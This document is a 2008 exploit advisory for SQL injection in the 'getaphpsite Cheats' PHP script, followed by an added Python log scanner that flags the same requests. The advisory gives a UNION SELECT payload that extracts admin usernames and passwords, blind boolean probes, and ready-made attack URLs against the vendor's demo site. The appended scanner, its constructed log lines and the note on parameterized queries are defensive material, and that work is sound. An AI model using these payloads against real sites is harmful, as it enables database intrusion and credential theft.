getaphpsite Cheats suffers from remote SQL injection vulnerabilities in categories.php and view_reviews.php.
[~] getaphpsite Cheats (id) R-Sql & B-Sql inj : ) )
[~]
[~] script: http://www.getaphpsite.com/134.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~] -----------------------------------------------------------
Exp 1: ( Remote )
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[SQL] ( I smell an advertisement : ) z0rlu.blogspot.com )
[SQL]=
0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--
exp 2: ( Blind )
http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[BLiND]
[id]+and+substring(@@version,1,1)=5 ( true )
[id]+and+substring(@@version,1,1)=4 ( false )
for demo: ( Remote )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--
for demo: ( Blind )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 ( true )
http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
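
Added example, not part of the original advisory: a log check that flags requests to the affected scripts whose id parameter is not a plain integer, which covers both request shapes shown above. It assumes id is meant to be numeric (as in the demo's id=13) and that the server writes common log format; the sample lines, IP addresses and label names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2009:10:00:01 +0000] "GET /demos/cheats/view_reviews.php?id=13 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2009:10:00:05 +0000] "GET /demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2009:10:00:06 +0000] "GET /demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 HTTP/1.1" 200 812
198.51.100.9 - - [01/Jan/2009:10:00:09 +0000] "GET /demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin-- HTTP/1.1" 200 5300
203.0.113.4 - - [01/Jan/2009:10:01:00 +0000] "GET /demos/cheats/index.php HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Script names taken from the advisory summary line.
SCRIPTS = ("view_reviews.php", "categories.php")


def classify_id(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    lowered = value.lower()
    if re.search(r"\bunion\b.+\bselect\b", lowered):
        return "union-select"
    if re.search(r"\b(and|or)\b.+=", lowered):
        return "boolean-probe"
    return "non-numeric"


def scan(log_text):
    """Return (client_ip, label, decoded_id) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith(SCRIPTS):
            continue
        # parse_qs decodes '+' to a space and splits on the first '=' only.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((ip, label, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

The same integer check applied in the application before the value reaches the query, together with a parameterized statement, closes both the union and the blind variant.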